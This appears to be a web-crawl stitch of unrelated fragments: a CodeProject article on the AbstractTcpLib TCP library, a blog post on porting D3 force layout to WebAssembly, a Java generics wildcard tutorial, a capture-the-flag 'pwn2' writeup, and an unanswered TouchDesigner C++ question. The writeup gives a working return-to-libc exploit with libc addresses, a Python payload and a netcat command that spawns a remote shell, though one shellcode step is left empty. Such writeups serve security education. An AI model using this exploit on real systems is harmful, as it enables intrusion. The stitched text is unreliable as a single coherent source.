        transfer.transferComplete -= complete;
        transfer.transferError -= transferError;
        transfer.transferProgress -= updateProgress;
    };

    transfer.transferComplete += complete;
    transfer.transferError += transferError;
    transfer.transferProgress += updateProgress;

    UI(() => lvIncommingFiles.Items.Add(lvi));
};

VB.NET:

server.receivingFile = Sub(transfer As FileTransfer)
    Dim lvi As New ListViewItem(transfer.FileName())
    Dim complete As FileTransfer.FileTransferComplete = Nothing
    Dim updateProgress As FileTransfer.FileTransferProgress = Nothing
    Dim transferError As FileTransfer.FileTransferError = Nothing

    lvi.SubItems.Add("0%")
    lvi.SubItems.Add(transfer.DestinationFolder())
    lvi.SubItems.Add("Transfering file")

    complete = Sub()
        UI(Sub()
            lvi.SubItems(3).Text = "Complete"
        End Sub)
        transfer.transferComplete = [Delegate].Remove(transfer.transferComplete, complete)
        transfer.transferError = [Delegate].Remove(transfer.transferError, transferError)
        transfer.transferProgress = [Delegate].Remove(transfer.transferProgress, updateProgress)
    End Sub

    updateProgress = Sub(percentComplete As UShort)
        UI(Sub()
            lvIncommingFiles.BeginUpdate()
            lvi.SubItems(1).Text = percentComplete.ToString() + "%"
            lvIncommingFiles.EndUpdate()
        End Sub)
    End Sub

    transferError = Sub(errorMessage As String)
        UI(Sub()
            lvi.SubItems(2).Text = "Error: " + errorMessage
            lvi.ForeColor = Color.Red
        End Sub)
        transfer.transferComplete = [Delegate].Remove(transfer.transferComplete, complete)
        transfer.transferError = [Delegate].Remove(transfer.transferError, transferError)
        transfer.transferProgress = [Delegate].Remove(transfer.transferProgress, updateProgress)
    End Sub

    transfer.transferComplete = [Delegate].Combine(transfer.transferComplete, complete)
    transfer.transferError = [Delegate].Combine(transfer.transferError, transferError)
    transfer.transferProgress = [Delegate].Combine(transfer.transferProgress, updateProgress)

    UI(Function() lvIncommingFiles.Items.Add(lvi))
End Sub

I didn't initially include any information about this because - like most developers, I think - I just assumed that everyone would automatically understand how it worked. Well, today I learned that it's not quite as intuitive as I imagined, so I'm going to outline exactly how to do it here.

First, to send your custom classes from your clients to your server (or the reverse), both your server and your client have to know about them. You can't just create a class in your client and send it; your server won't understand what it's receiving.

1.) Create a new class file in your project. When I write "your project", I mean the project in which you will be adding a reference to AbstractTcpLib, and creating an AbstractTcpLib.Client() or an AbstractTcpLib.Server(). If you want to send your own custom class objects back and forth between client and server, you must create this custom class in both the project you are creating an AbstractTcpLib.Client() in, and the project you are creating an AbstractTcpLib.Server() in, and they must be identical.

2.) Change the default namespace to something descriptive and useful in both your server and client applications. In this example project, there is now a "MyObj" class. This class is in the "MyObjects" namespace. There is an identical MyObj class in both the server and the client applications, so you can see how this is done.

3.) When your server (or client) receives an object, you need to test for it using typeof. Something like this will work:

if (data.type == typeof(MyObjects.MyObj))
{
    MyObjects.MyObj obj = (MyObjects.MyObj)data.deSerialized;
    // Do something with obj here.
}

If data.type = GetType(MyObjects.MyObj) Then
    Dim obj As MyObjects.MyObj = DirectCast(data.deSerialized, MyObjects.MyObj)
    ' Do something with obj here.
End If

And that's it. If you attempt to send a class or object that the receiving assembly can not understand, you will instead be handed an XmlObject containing the exception information generated when deserialization failed.

Of course. Please see the example application for anything else you need to know how to do. If you can't find it there, or you run into an issue, please feel free to ask below.

None yet.

Definitely. Cooperative throttling, for starters. Encrypted registration requests for clients using LDAP authentication (at the moment they are only deflated, preventing clear-text transmission of login credentials), and more as I think of it, or you ask for it, and I have the time.

This library is cool... if I do say so myself.
I have enjoyed building it, and to a small degree testing it. But there's a lot of code here, and there's just no way I could test it as thoroughly as I would like... and it's brand new. I'm going to use it in future projects, and post fixes as bugs appear. If you find one, please feel free to let me know. I'll fix it and post a new build as I'm able.

Thanks,
- Pete

The following list contains changes in version 1.4.2 of this library:
The following list contains changes in version 1.4.1 of this library:
The following list contains changes in version 1.4 of this library:
The following list contains changes in version 1.3.1 of this library:
The following list contains changes in version 1.2 of this library:
The following list contains changes in version 1.1 of this library:

This article, along with any associated source code and files, is licensed under The Code Project Open License (CPOL)

A reader hit a SerializationException when sending a custom class from a VB.NET client:

Private Sub btSend_Click(sender As Object, e As EventArgs) Handles btSend.Click

System.Runtime.Serialization.SerializationException occurred
  HResult=0x8013150C
  Message=Type 'AbstractTcpClient.MyObjects.MyObject' in Assembly 'VbAbstractTcpClient, Version=1.0.0.0, Culture=neutral, PublicKeyToken=null' is not marked as serializable.
  Source=mscorlib
  StackTrace:
   at System.Runtime.Serialization.FormatterServices.InternalGetSerializableMembers(RuntimeType type)
   at System.Runtime.Serialization.FormatterServices.<>c__DisplayClass9_0.<GetSerializableMembers>b__0(MemberHolder _)
   at System.Collections.Concurrent.ConcurrentDictionary`2.GetOrAdd(TKey key, Func`2 valueFactory)
   ...WriteObjectInfo.Serial...
   at AbstractTcpLib.Core.Utilities.Serialize(Object o, Compression deflated) in V:\VisualStudioSource\.NET Sample Code\AbstractTcpLib1.4\AbstractTcpLib\Core.cs:line 375
   at AbstractTcpLib.Core.Utilities.CreatePacket(Object serializableObject, AesEncryptor encryptor, Boolean useEncryption, PacketOptions options) in V:\VisualStudioSource\.NET Sample Code\AbstractTcpLib1.4\AbstractTcpLib\Core.cs:line 555
   at AbstractTcpLib.Client.SendObject(Object serializableObject, String& errMsg, Boolean blockUntilSent, Socket socket, Boolean encrypt, AesEncryptor localCrypt, Boolean encodeAsArray) in V:\VisualStudioSource\.NET Sample Code\AbstractTcpLib1.4\AbstractTcpLib\Client.cs:line 643
   at AbstractTcpLib.Client.Send(Object serializableObject, String& errMsg, Boolean blockUntilSent) in V:\VisualStudioSource\.NET Sample Code\AbstractTcpLib1.4\AbstractTcpLib\Client.cs:line 615
   at AbstractTcpClient.frmMain.btSend_Click(Object sender, EventArgs e) in V:\VisualStudioSource\.NET Sample Code\AbstractTcpLib1.4\vb\AbstractTcpClient\AbstractTcpClient\frmMain.vb:line 150
   at AbstractTcpClient.My.MyApplication.Main(String[] Args) in :line 81

As the exception message indicates, the fix is to mark the class as serializable, as in the working example below:

[Serializable]
public class MyObj
{
    public int n1 = 0;
    public int n2 = 0;
    public String str = null;
}

private void button1_Click(object sender, EventArgs e)
{
    MyObj thetestobj = new MyObj();
    thetestobj.n1 = 50;
    thetestobj.n2 = 55;
    thetestobj.str = "Just Testing";

    String errMsg = "";
    if (!client.Send(thetestobj, out errMsg))
    {
        MessageBox.Show(errMsg, "Send failed.", MessageBoxButtons.OK, MessageBoxIcon.Error);
    }
}

if (options.dataFormat == PacketOptions.DataFormat.SerializedData)
{
    hdo.comm = new CommData(o, ref buffer, buffer.Length);
    options = null;
}
else

On the receiving side, declare the identical class and test for it as described above:

namespace MyObjects
{
    [Serializable]
    public class MyObj
    {
        public int n1 = 0;
        public int n2 = 0;
        public String str = null;
    }
}

// Get our passed object:
var xmlo = data.GetObject();

// Your code:
if (data.type == typeof(MyObjects.MyObj))
{
    MyObjects.MyObj obj =
        (MyObjects.MyObj)data.deSerialized;
    // Do something with obj here.
}
https://www.codeproject.com/Articles/1192106/Abstracting-TCP-Communications-and-adding-what-sho
CC-MAIN-2019-04
en
refinedweb
In this blog post I'll take a look at a real-world application of WebAssembly (WASM): the re-implementation of D3 force layout. The end result is a drop-in replacement for the D3 APIs, compiled to WASM using AssemblyScript (TypeScript).

In my previous post on WASM I explored various different techniques for rendering Mandelbrot fractals. In some ways this is the perfect application for the technology: a computationally intensive operation, exposed via a simple interface that operates on numeric types.

In this post, I want to start exploring slightly less contrived applications of WASM. As someone who is a frequent user of D3, I thought I'd have a go at re-implementing the force layout component. My goal? To create a drop-in replacement for the D3 APIs, with all the 'physics' computation performed using WASM. Rather than implement the entire API, my aim was to port the popular Les Misérables example.

Here is the force layout simulation for the above example:

var simulation = d3.forceSimulation(graph.nodes)
  .force("link", d3.forceLink().links(graph.links).id(d => d.id))
  .force("charge", d3.forceManyBody())
  .force("center", d3.forceCenter(width / 2, height / 2));

And here is the WASM equivalent:

var simulation = d3wasm.forceSimulation(graph.nodes, true)
  .force('link', d3wasm.forceLink().links(graph.links).id(d => d.id))
  .force('charge', d3wasm.forceManyBody())
  .force('center', d3wasm.forceCenter(width / 2, height / 2))

As you can see, they are identical. You can see the WASM force layout in action here. The sourcecode for this demo is also available on GitHub.

AssemblyScript

Typically WASM modules are created by compiling languages like C, C++, or Rust using Emscripten. However, in this instance I had a pre-existing JavaScript codebase, so AssemblyScript, which compiles TypeScript to WASM, seemed like a much better option. I was hoping that the migration process would simply involve taking the d3-force code and sprinkling a few types into the mix. Unfortunately it was a little more complicated than that!

Migration of the core algorithms, in this case a many-body and a 'link' force simulation, was quite straightforward.
Here's the original code for the link force simulation:

function force(alpha) {
  for (var i = 0, link, source, target, x, y, l, b; i < n; ++i) {
    link = links[i], source = link.source, target = link.target;
    x = target.x + target.vx - source.x - source.vx || jiggle();
    y = target.y + target.vy - source.y - source.vy || jiggle();
    l = Math.sqrt(x * x + y * y);
    l = (l - distances[i]) / l * alpha * strengths[i];
    x *= l, y *= l;
    target.vx -= x * (b = bias[i]);
    target.vy -= y * b;
    source.vx += x * (b = 1 - b);
    source.vy += y * b;
  }
}

And here it is migrated to AssemblyScript:

let distance: f64 = 30;

export function linkForce(alpha: f64): void {
  for (let i: i32 = 0; i < linkArray.length; i++) {
    const link: NodeLink = linkArray[i];
    let dx: f64 = link.target.x + link.target.vx - link.source.x - link.source.vx;
    let dy: f64 = link.target.y + link.target.vy - link.source.y - link.source.vy;
    const length: f64 = sqrt(dx * dx + dy * dy);
    const strength: f64 = 1 / min(link.target.links, link.source.links);
    const deltaLength: f64 = (length - distance) / length * strength * alpha;
    dx = dx * deltaLength;
    dy = dy * deltaLength;
    link.target.vx = link.target.vx - dx * link.bias;
    link.target.vy = link.target.vy - dy * link.bias;
    link.source.vx = link.source.vx + dx * (1 - link.bias);
    link.source.vy = link.source.vy + dy * (1 - link.bias);
  }
}

As you can see, this is very similar, and the migration of the algorithms was straightforward. By far the most complicated part of the migration process was actually getting the data (nodes and links) into the WASM code …

WASM Module Interface

You can export functions from WASM modules allowing them to be invoked by your JavaScript code, and you can also import JavaScript functions so that they can be invoked from WASM. Unfortunately WASM only supports four types (all numeric), so you cannot simply provide the force layout algorithm with an array of links and nodes. In order to pass more complex data types, you have to (1) write the data to the WASM module's linear memory from the hosting JavaScript, then (2) read the data from your WASM code. As AssemblyScript is a subset of TypeScript, it provides an interesting way of achieving this …

The D3 force layout simulation manipulates an array of nodes. These can be represented as classes within AssemblyScript:

export class Node {
  x: f64;
  y: f64;
  vx: f64;
  vy: f64;
  links: f64 = 0;

  static size: i32 = 4;

  static read(node: Node, buffer: Float64Array, index: i32): Node {
    node.x = buffer[index * Node.size];
    node.y = buffer[index * Node.size + 1];
    node.vx = buffer[index * Node.size + 2];
    node.vy = buffer[index * Node.size + 3];
    return node;
  }

  static write(node: Node, buffer: Float64Array, index: i32): Node {
    buffer[index * Node.size] = node.x;
    buffer[index * Node.size + 1] = node.y;
    buffer[index * Node.size + 2] = node.vx;
    buffer[index * Node.size + 3] = node.vy;
    return node;
  }
}

The above code defines a node with a location (x, y) and velocity components (vx, vy); it also defines static functions for reading / writing the node to a Float64Array.
The following class handles reading / writing this array of nodes to module memory:

class NodeArraySerialiser {
  array: Float64Array;
  count: i32;

  initialise(count: i32): void {
    this.array = new Float64Array(count * Node.size);
    this.count = count;
  }

  read(): Array<Node> {
    let typedArray: Array<Node> = new Array<Node>(this.count);
    for (let i: i32 = 0; i < this.count; i++) {
      typedArray[i] = Node.read(new Node(), this.array, i);
    }
    return typedArray;
  }

  write(typedArray: Array<Node>): void {
    for (let i: i32 = 0; i < this.count; i++) {
      Node.write(typedArray[i], this.array, i);
    }
  }
}

The module exports functions that allow the serialiser to be initialised from the hosting JavaScript code, allowing it to set the node array length (which initialises the Float64Array), obtain a reference to this array, and instruct the module to read from this array:

let serializer = new NodeArraySerialiser();
let nodeArray: Array<Node>;

export function setNodeArrayLength(count: i32): void {
  serializer.initialise(count);
}

export function getNodeArray(): Float64Array {
  return serializer.array;
}

export function readFromMemory(): void {
  nodeArray = serializer.read();
}

The following code snippet shows how the JavaScript code that uses this module can pass the node data via this node array:

import { Node } from '../wasm/force';

const nodes = [
  {x: 34, y: 25},
  {x: 12, y: 22},
  ...
]

// initialise the wasm module memory
wasmModule.setNodeArrayLength(nodes.length);
const nodeBuffer = wasmModule.getNodeArray();

// write the node data
nodes.forEach((node, index) => Node.write(node as Node, nodeBuffer, index));

// instruct the wasm module to read the nodes
wasmModule.readFromMemory();

Because AssemblyScript is valid TypeScript, the above code re-uses the Node class, which has the static methods for reading / writing nodes to array buffers! To achieve this, the build compiles the WASM module code twice: once with the TypeScript compiler, and once with the AssemblyScript compiler (more on this later).

The above code shows how nodes are passed from JavaScript to the WASM module. Once the WASM code has updated the nodes (positions and velocities), the same happens in reverse, i.e. WASM writes. The following utility function executes any WASM function, surrounding it in the required read / write of nodes:

const executeWasm = (wasmCode) => {
  // write the nodes to the WASM linear memory
  let nodeBuffer = computer.getNodeArray();
  nodes.forEach((node, index) => Node.write(node as Node, nodeBuffer, index));

  // read the values from linear memory
  computer.readFromMemory();

  wasmCode();

  // write back any updates
  computer.writeToMemory();

  // read back into the JS node array
  nodeBuffer = computer.getNodeArray();
  nodes.forEach((node, index) => Node.read(node as Node, nodeBuffer, index));
};

Working with AssemblyScript

AssemblyScript is a subset of TypeScript, which means it only supports a subset of the language features. As an example, it doesn't support interfaces, or the declaration of functional types.

AssemblyScript includes a number of built-in maths functions (min, sqrt, …) which are built-in WebAssembly operators. However, there are a number of omissions, e.g. PI, sin, cos. For these, you either have to expose JavaScript implementations to your AssemblyScript code (which feels quite messy), or implement them using AssemblyScript primitives.

Another notable difference between AssemblyScript and TypeScript is the array class. The AssemblyScript array interface implements a small subset of the TypeScript functionality.
The reason for this is quite simple: WASM doesn't have an array type. In order to provide this functionality, AssemblyScript has a small standard library which implements these features. You can see the array implementation in the sourcecode; notice the use of malloc, which is part of the lightweight runtime for AssemblyScript that becomes part of the module.

Compiling to TypeScript

A really interesting feature of AssemblyScript is that you can run the same code through the TypeScript compiler. You do have to provide implementations of the AssemblyScript floating point operators. Thankfully, the JavaScript equivalents just slot straight in …

window.sqrt = Math.sqrt;
window.min = Math.min;
...

One difference with the TypeScript output is that when you return a Float64Array from your module you actually get the array, whereas with WASM the compiled function returns an integer which indicates the location of the array in memory. In order to resolve the differences in the module interface when compiled to JavaScript or WASM, I created a simple proxy that adapted the WASM module, giving both the same interface:

new Proxy(wasm, {
  get: (target, name) => {
    if (name === 'getNodeArray') {
      return () => {
        const offset = wasm.getNodeArray();
        return new Float64Array(wasm.memory.buffer, offset + 8,
          wasm.getNodeArrayLength() * Node.size);
      };
    } else if (name === 'getLinkArray') {
      return () => {
        const offset = wasm.getLinkArray();
        return new Uint32Array(wasm.memory.buffer, offset + 8,
          wasm.getLinkArrayLength() * NodeLink.size);
      }
    } else {
      return target[name];
    }
  }
})

This converts the integer 'pointers' returned by WASM into typed arrays. Notice that the offset provided by the WASM module needs to have the magic number 8 added to it. This relates to the AssemblyScript array implementation, where the first few bytes are used to store the capacity and length before the array contents itself.

Being able to run the same code as both JavaScript (via TypeScript) and WASM is great for debugging; I found quite a few errors in my module code that would have been really hard to track down if I only had access to the compiled module. Although of course, there are further differences at runtime: for example, AssemblyScript types default to zero, whereas in TypeScript / JavaScript they default to undefined.

Currently the choice between WASM or JavaScript is exposed as a boolean argument on the simulation. Setting it to false will run the JavaScript module:

var simulation = d3wasm.forceSimulation(graph.nodes, false)

Bundling

One final thing I looked at was how WASM modules could be bundled. Most WASM examples load the WebAssembly binary over HTTP via the fetch API. This is not ideal for distribution of mixed WASM / JavaScript modules. In order to bundle the two together, I wrote a simple rollup plugin that base64 encodes the WASM module and embeds it as a string. With this plugin included in the rollup config, imported WASM modules are returned as a promise which resolves to the module instance:

import wasmCode from '../../build/force.wasm';

export const loaded = wasmCode()
  .then(instance => {
    // do something:
  });

The reason they return promises is that WASM compilation is not performed on the main thread, to avoid locking the UI. This does of course have an impact on consumers of this code; they too have to wait for the WASM code to be compiled.
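For what it's worth, a plugin of that general shape could look something like the sketch below. This is my own illustrative reconstruction, not the plugin used for the demo; the plugin name and the shape of the generated wrapper are assumptions:

// rollup-plugin-wasm-inline.js (hypothetical name)
import { readFileSync } from 'fs';

export default function wasmInline() {
  return {
    name: 'wasm-inline',
    // Intercept .wasm imports and replace them with a JS module that
    // embeds the binary as a base64 string.
    load(id) {
      if (!id.endsWith('.wasm')) return null;
      const base64 = readFileSync(id).toString('base64');
      return `
        var encoded = '${base64}';
        export default function instantiate(imports) {
          // decode base64 back into bytes, then compile asynchronously
          var bytes = Uint8Array.from(atob(encoded), function (c) { return c.charCodeAt(0); });
          return WebAssembly.instantiate(bytes, imports)
            .then(function (result) { return result.instance; });
        }`;
    }
  };
}

Like the real plugin, the generated wrapper returns a promise, because WebAssembly.instantiate compiles asynchronously.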
As a result, my force layout API exposes a loaded promise, which is used as follows: d3wasm.loaded .then(() => { const simulation = d3wasm.forceSimulation(graph.nodes, true) .force('charge', d3wasm.forceManyBody()) .force('center', d3wasm.forceCenter(width / 2, height / 2)) .force('link', d3wasm.forceLink().links(graph.links).id(d => d.id)); }); Conclusions Most people are currently focussing on the use of WebAssembly to bring performance critical code from other languages to the web. This is certainly a useful application of the technology. However, I think that AssemblyScript (and TurboScript, speedy.js) demonstrate that we could be doing a lot more with this technology. If at some point in the future you could easily compile your JavaScript code to WASM, and enjoy improved load / parse times and performance, why wouldn’t you? We’re clearly not there yet, porting JavaScript to AssemblyScript is not straightforward - however, this technology is very much in its infancy. Remember, the full sourcecode for this demo is available on GitHub.
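As promised above, here is a minimal sketch of what the Node class used throughout this post might look like. The field set (x, y, vx, vy) and the flat f64 layout are assumptions inferred from the calls above (Node.size, Node.read, Node.write); the real class in the repo may differ:

export class Node {
  // number of f64 values stored per node in the flat buffer (assumed)
  static size: i32 = 4;

  x: f64;
  y: f64;
  vx: f64;
  vy: f64;

  // copy the node at the given index out of the flat buffer
  static read(node: Node, buffer: Float64Array, index: i32): Node {
    const base: i32 = index * Node.size;
    node.x = buffer[base];
    node.y = buffer[base + 1];
    node.vx = buffer[base + 2];
    node.vy = buffer[base + 3];
    return node;
  }

  // write the node into the flat buffer at the given index
  static write(node: Node, buffer: Float64Array, index: i32): void {
    const base: i32 = index * Node.size;
    buffer[base] = node.x;
    buffer[base + 1] = node.y;
    buffer[base + 2] = node.vx;
    buffer[base + 3] = node.vy;
  }
}

When this file is run through the TypeScript compiler, i32 and f64 simply alias to number, which is what makes the dual-compilation trick described above possible.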
https://blog.scottlogic.com/2017/10/30/migrating-d3-force-layout-to-webassembly.html
CC-MAIN-2019-04
en
refinedweb
Generics is confusing (in fact one of the most confusing concepts of Java); and on top of it, wildcards (bounds) are even more confusing. That explains the reason for this dedicated post :)

In the Generics post, I discussed that subtyping doesn't work with Generics. So, if Apple extends Fruit, a list of Apple is not a subtype of a list of Fruit. Does it mean that Generics can't be generic and you can't write a method which works for subtypes? Luckily, wildcards help you make Generics really generic.

Bounded Wildcard

Generics uses a wildcard character (?) to work with subtypes. Let's go into detail on each.

upper-bounded wildcard: uses the wildcard (?), followed by the extends keyword, followed by its upper bound. List<? extends Number> will work for a List of Number and lists of its subtypes (Integer, Double and Float).

List<Integer> li = new ArrayList<Integer>();
List<? extends Number> list = li;

lower-bounded wildcard: uses the wildcard, followed by the super keyword, followed by its lower bound. List<? super Integer> will work for a list of Integer, a list of Number and a list of Object.

List<Number> ln = new ArrayList<Number>();
List<? super Integer> list1 = ln;

Unbounded Wildcard

Using just the wildcard, i.e. ?, makes it unbounded. It means an unknown type, so at first glance it looks similar to using a raw type. <?> says: I wrote this code keeping Generics in mind, but it can hold any type. List<?> is a non-raw list of some specific type, but we don't know what that type is. So the type is unknown, but that doesn't mean the list can take anything!

List<Integer> li2 = new ArrayList<Integer>();
List<?> l3 = li2;

Code Talk

Time to walk the talk through a simple example.

import java.util.ArrayList;
import java.util.List;

/**
 * Defines base class Fruit and subclasses Apple and FujiApple.
 * Uses BoundsGenericsTest for testing wildcards.
 * Save it as BoundsGenericsTest.java
 *
 * @author Siddheshwar
 */
class Fruit {
    protected String name;

    public Fruit(String name) {
        super();
        this.name = name;
    }

    public String toString() {
        return name;
    }
}

class Apple extends Fruit {
    public Apple(String name) {
        super(name);
    }
}

class FujiApple extends Apple {
    public FujiApple(String name) {
        super(name);
    }
}

public class BoundsGenericsTest {
    List<? extends Fruit> list;

    public void add(List<? extends Fruit> f) {
        list = f;
    }

    public static void main(String[] args) {
        BoundsGenericsTest obj = new BoundsGenericsTest();

        List<Apple> apples = new ArrayList<Apple>();
        apples.add(new Apple("apple1"));
        apples.add(new Apple("apple2"));
        obj.add(apples);
        System.out.println(" list of Apples: " + obj.list);

        List<FujiApple> fujiApples = new ArrayList<FujiApple>();
        fujiApples.add(new FujiApple("fujiapple1"));
        fujiApples.add(new FujiApple("fujiapple2"));
        obj.add(fujiApples);
        System.out.println(" list of FujiApples : " + obj.list);

        List<? super FujiApple> another = (List<? super FujiApple>) obj.list;
        System.out.println(" val :" + another);

        List<? super FujiApple> another1 = fujiApples;
        System.out.println(" val :" + another1);

        // unbounded wildcard
        List<?> fruits = apples;
        System.out.println("Fruits:" + fruits);
    }
}

Output:

list of Apples: [apple1, apple2]
list of FujiApples : [fujiapple1, fujiapple2]
val :[fujiapple1, fujiapple2]
val :[fujiapple1, fujiapple2]
Fruits:[apple1, apple2]

Related Post : Java Generics
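To round this off with the classic rule of thumb, PECS ("producer extends, consumer super"), here is a small add-on example (not from the original post) that reuses the Fruit, Apple and FujiApple classes defined above. Reading from a list needs extends; writing into one needs super:

import java.util.ArrayList;
import java.util.List;

public class PecsDemo {
    // producer: we only read Fruits out of the list, so "? extends Fruit"
    static void printAll(List<? extends Fruit> fruits) {
        for (Fruit f : fruits) {
            System.out.println(f);
        }
        // fruits.add(new Apple("a")); // compile error: can't add to "? extends"
    }

    // consumer: we only put Apples into the list, so "? super Apple"
    static void addApples(List<? super Apple> basket) {
        basket.add(new Apple("apple3"));
        basket.add(new FujiApple("fujiapple3")); // FujiApple IS-A Apple, so OK
    }

    public static void main(String[] args) {
        List<Apple> apples = new ArrayList<Apple>();
        addApples(apples);  // List<Apple> is a valid "? super Apple"
        printAll(apples);   // List<Apple> is a valid "? extends Fruit"

        List<Fruit> fruits = new ArrayList<Fruit>();
        addApples(fruits);  // List<Fruit> is also a valid "? super Apple"
        printAll(fruits);
    }
}

Trying to call basket.add(...) inside printAll, or passing a List<FujiApple> to addApples, would fail to compile; that is exactly the safety the bounds buy you.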
http://geekrai.blogspot.com/2014/06/wildcard-in-generics.html
CC-MAIN-2019-04
en
refinedweb
pwn2 - 120 (Pwning)

Writeup by r3ndom_

Created: 2015-12-08

Problem

This one is a bit more complicated... nc pwn.problem.sctf.io 1338

Flag is in flag.txt

Hint

It runs on the same box as pwn1.

Answer

Overview

The binary for pwn2 contains no imports for system, and as such we can't spawn a shell with that. This means we have to turn to pwn1 to get the addresses of system and "/bin/sh" in libc.

Details

The buffer is yet again at an offset of 0x2c from the location that will be returned to. This means we begin with the same concept:

shell_code = 'A'*0x2c

Then we find a way to set eip to esp. First find a push esp; the opcode for this instruction is 0xff 0xf4. We can use the 0xff 0xf4 from _start that is part of the call to __libc_start_main. The next instructions are all xchg ax, ax. This is effectively a nop and is used by gcc for spacing. Then there's a function that returns without changing the stack. Perfect, our code will fall through from there.

shell_code += '\xd0\x83\x04\x08'

There we go, that'll call anything we put past this point. Now we write a little bit of shellcode to call system.

shell_code += ""
print shell_code

Now we just pipe that into the pwn1 server to get a call to system with an argument of our choosing, which can be "/bin/sh" to spawn us a shell. After this, go to the tmp directory so you can use gdb (it only works with file write perms), and wget pwn2. Then you can execute gdb on pwn2 and do:

b main
r
p system
find &system,+999999,"/bin/sh"

This will find you the addresses you need to ROP pwn2. Now you can build an exploit for pwn2.

import struct

def gen_ptr(a):
    return struct.pack("<L", a)

rop = 'A'*0x2c

# system address
rop += gen_ptr(0xb7e67190)

# filler (the fake return address system() will return to)
rop += 'wow_'

# "/bin/sh" address
rop += gen_ptr(0xb7e5a1e0)

print rop

Now just cat <(python rop.py) - | nc pwn.problem.sctf.io 1338 and you can use the shell on pwn2 to cat flag.txt.

Flag

flag{p0pp1ng_sh3ll_thr0ugh_libc}
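For readers who prefer pwntools, an equivalent of rop.py plus the netcat pipe might look like this (my own sketch, not part of the original writeup; it assumes pwntools is installed and reuses the libc addresses found above):

from pwn import remote, p32

payload  = b'A' * 0x2c
payload += p32(0xb7e67190)   # address of system() in libc
payload += b'JUNK'           # fake return address for system()
payload += p32(0xb7e5a1e0)   # address of "/bin/sh" in libc

io = remote('pwn.problem.sctf.io', 1338)
io.sendline(payload)
io.interactive()             # then: cat flag.txt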
https://sctf.ehsandev.com/pwn/pwn2.html
CC-MAIN-2019-04
en
refinedweb
The scrolling display boards are among the most attractive of all display boards. They are widely used in advertisements, in public transport vehicles, and as information boards in railway stations, airports, etc. They are commonly made of LED matrices or LCD screens and are usually connected to a computer or a simple microcontroller which can send the data to the screen. The microcontroller can send data to the screen using its serial port. The data can be stored in the microcontroller itself or received from a PC. The serial communication port is one of the most effective communication methods available with a microcontroller. The serial port of the microcontroller provides the easiest way by which the user's PC and the microcontroller can write their data to the same medium, and both can read each other's data.

A normal LCD module found in embedded system devices can be made into a scrolling display. It can respond to built-in scrolling commands which make LCD scrolling possible. It is possible to connect the serial port of the PC with the LCD module through the Arduino board. In such a system the user can send data from the PC to the Arduino's serial port using software running on the PC, and can view the same data, scrolling, on the LCD module connected to the Arduino board if the necessary statements are written in the code.

This project uses functions for accessing the LCD module available from the library <LiquidCrystal.h>, as explained in the previous project on how to interface the 4-bit LCD with the Arduino board. The serial communication functions are also used in this project, as already discussed in a previous project on how to receive and send serial data using Arduino. Apart from those functions, this project makes use of two more functions for the LCD, namely lcd.write() and lcd.autoscroll(); the details of them are discussed in the following section.

lcd.write()

The lcd.write() is a function which is used to print data to the LCD screen like the lcd.print() function does. Unlike the lcd.print() function, the lcd.write() function directly writes the value to the LCD screen without formatting it as ASCII. This function is analogous to the Serial.write() function discussed in the project how to receive and send serial data using Arduino.

lcd.autoscroll()

This function is called after initializing the LCD module using the lcd.begin() function and after setting the cursor position using the lcd.setCursor() function. This function makes the scrolling possible by shifting the currently displayed data to either side of the LCD as each character is written to the LCD screen.

THE CODE

The code initializes the LCD library as per the connection of the LCD with the Arduino board using the function LiquidCrystal lcd(). The function lcd.begin() is used to initialize the LCD module in four-bit mode with a two-line display. The lcd.setCursor() function is used to set the cursor at the 16th position of the second line of the 16*2 LCD, from where the scrolling is supposed to start. The serial port is initialized with a 9600 baud rate using the function Serial.begin(). The function Serial.available() is used in the code to check whether serial data is available to read or not. The Serial.read() function is used to read the serial data coming from the PC, which is then stored in a variable and displayed on the LCD using the function lcd.write().

// include the library code:
#include <LiquidCrystal.h>

// initialize the library with the numbers of the interface pins
LiquidCrystal lcd(12, 11, 5, 4, 3, 2);

// give the pin a name:
int led = 6;

// incoming byte
char inByte;

void setup()
{
  // initialize the led pin as an output.
  pinMode(led, OUTPUT);
  // set up the LCD's number of columns and rows:
  lcd.begin(16, 2);
  // initialize the serial communications:
  Serial.begin(9600);
  // set the cursor to (16,1):
  lcd.setCursor(16, 1);
  // set the display to automatically scroll:
  lcd.autoscroll();
}

void loop()
{
  // if we get a valid byte, read it:
  if (Serial.available()) {
    // get incoming byte:
    inByte = Serial.read();
    // send the same character to the LCD
    lcd.write(inByte);
    // glow the LED
    digitalWrite(led, HIGH);
    delay(200);
  }
  else {
    digitalWrite(led, LOW);
  }
}

Whenever a key is pressed on the keyboard, the code receives the data byte and sends the same byte to the LCD, which displays it after shifting the current display one position to the side.
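On the PC side, any serial terminal will do, but for a quick test, here is a minimal Python sketch using pyserial (an addition for illustration, not part of the original article; adjust the port name for your system):

import serial
import time

# open the Arduino's serial port at the same baud rate as the sketch
port = serial.Serial('/dev/ttyUSB0', 9600, timeout=1)  # e.g. 'COM3' on Windows
time.sleep(2)  # give the Arduino time to reset after the port opens

# send a message one character at a time; each byte scrolls onto the LCD
for ch in "HELLO WORLD ":
    port.write(ch.encode('ascii'))
    time.sleep(0.2)

port.close()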
https://www.engineersgarage.com/embedded/arduino/how-to-make-lcd-scrolling-display-using-arduino
CC-MAIN-2019-04
en
refinedweb
hopefully my questions will benefit others.

Assume I want to create a CHOP with more than 1 channel, as in the example. What is a fine way to do so?

My try so far:

1. Changed the number of channels to 3:

bool CPlusPlusCHOPExample::getOutputInfo(CHOP_OutputInfo* info)
{
    // If there is an input connected, we are going to match its channel names etc
    // otherwise we'll specify our own.
    if (info->opInputs->getNumInputs() > 0)
    {
        return false;
    }
    else
    {
        info->numChannels = 3;

        // Since we are outputting a timeslice, the system will dictate
        // the numSamples and startIndex of the CHOP data
        //info->numSamples = 1;
        //info->startIndex = 0

        // For illustration we are going to output 120hz data
        info->sampleRate = 120;
        return true;
    }
}

2. Added a private string array variable called "nameList" in the example header:

private:
    // We don't need to store this pointer, but we do for the example.
    // The OP_NodeInfo class stores information about the node that's using
    // this instance of the class (like its name).
    const OP_NodeInfo* myNodeInfo;

    // In this example this value will be incremented each time the execute()
    // function is called, then passed back to the CHOP
    int32_t myExecuteCount;

    std::string nameList[3];

    double myOffset;

Initialize it in the constructor:

CPlusPlusCHOPExample::CPlusPlusCHOPExample(const OP_NodeInfo* info) : myNodeInfo(info)
{
    myExecuteCount = 0;
    myOffset = 0.0;

    nameList[0] = "gal";
    nameList[1] = "barak";
    nameList[2] = "moshe";
}

3. Return the array entry for the incoming index:

const char* CPlusPlusCHOPExample::getChannelName(int32_t index, void* reserved)
{
    return (nameList[index].c_str());
